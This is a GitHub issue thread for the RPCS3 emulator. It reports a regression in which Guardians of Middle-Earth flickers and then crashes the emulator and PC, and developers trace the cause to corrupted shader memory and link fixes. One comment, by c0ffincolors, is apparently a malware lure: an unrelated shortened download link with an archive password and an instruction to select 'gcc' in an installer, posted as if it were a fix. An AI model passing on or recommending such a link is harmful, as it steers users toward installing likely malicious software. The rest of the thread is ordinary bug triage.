### ISSUE TITLE
[Regression] Guardians of Middle-Earth (NPUB30840)

### ISSUE THREAD

**Issue by Roikkudev** [RPCS3/rpcs3#16008]
### Quick summary

Graphics flickering on intro and main menu. Game freezes in menu, then emulator + PC crashes.

### Details

Guardians of Middle-Earth NPUB30840 with default emulator configuration and official game update v1.06, using Vulkan renderer as OpenGL is not available for my setup. The intro-video flickers and you can already tell it's going to also crash, but only once you get into the menus, not before. You get to the main menu and have a few seconds time to browse the selections, whilst game assets may pop in and out of view in the background. Then the game freezes, then the emulator freezes, then your PC freezes and you have to forcibly restart it. This happens every single time. Error log on emulator shows something about RSX each time, such as:
F {RSX [0x004ad10]} SIG: Thread terminated due to fatal error: Verification failed
(in file /rpcs3/rpcs3/Emu/RSX/VK/../Program/program_state_cache2.hpp:14[:2], in function void program_state_cache<vk::VKTraits>::fill_fragment_constants_buffer(std::span<f32>, const typename Traits::fragment_program_type &, const RSXFragmentProgram &, bool) const [backend_traits = vk::VKTraits]) (errno=11=Resource temporarily unavailable)

### Build with regression

v0.0.32-16614-5b973448

### Attach two log files

[broken16614_RPCS3.log](https://github.com/user-attachments/files/16764666/broken16614_RPCS3.log)
[working16611_RPCS3.log](https://github.com/user-attachments/files/16764699/working16611_RPCS3.log)

### System configuration

Linux Mint 22 Cinnamon, Cinnamon version 6.2.9, Linux kernel 6.8.0-41-generic, CPU: AMD Ryzen 5 5600H with Radeon Graphics × 6, Memory: 13.5 GiB (16 GiB), GPU: NVIDIA Corporation GA104M [GeForce RTX 3070 Mobile / Max-Q], Display Server: X11

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by kd-11** [comment]
I can reproduce this. Looks like a hash collision issue. Not a regression though, just broken shader cache interaction.

**Comment by kd-11** [comment]
Ok, there are 2 bugs. One is definitely a regression and the build mentioned works correctly. From the report, it would appear to be from https://github.com/RPCS3/rpcs3/pull/15623
Shader memory is completely being trashed, forwarding trash to the shader compiler which then generates "NOP" shaders (hence the lack of rendering on some frames). Invalid shaders are skipped (writes black to the color output), but we're leaving some stuff like the buffer sizes still recorded which causes the crash.
TL;DR - the flickering and crash are a symptom, caused by corrupted memory writes on CELL side. Options can't do anything to fix this.

In the meantime I'll push a fix for the crash itself. We shouldn't fully crash, just emit a warning.

**Comment by elad335** [comment]
coincidentally #16476 may have addressed this issue. Needs retesting.

**Comment by TigiHof** [comment]
Seems to be fixed by [#16881](https://github.com/RPCS3/rpcs3/pull/16881). With using "Disable SPU GETLLAR Spin Optimization" in Advanced tab there is no more flickering and no more crashes.
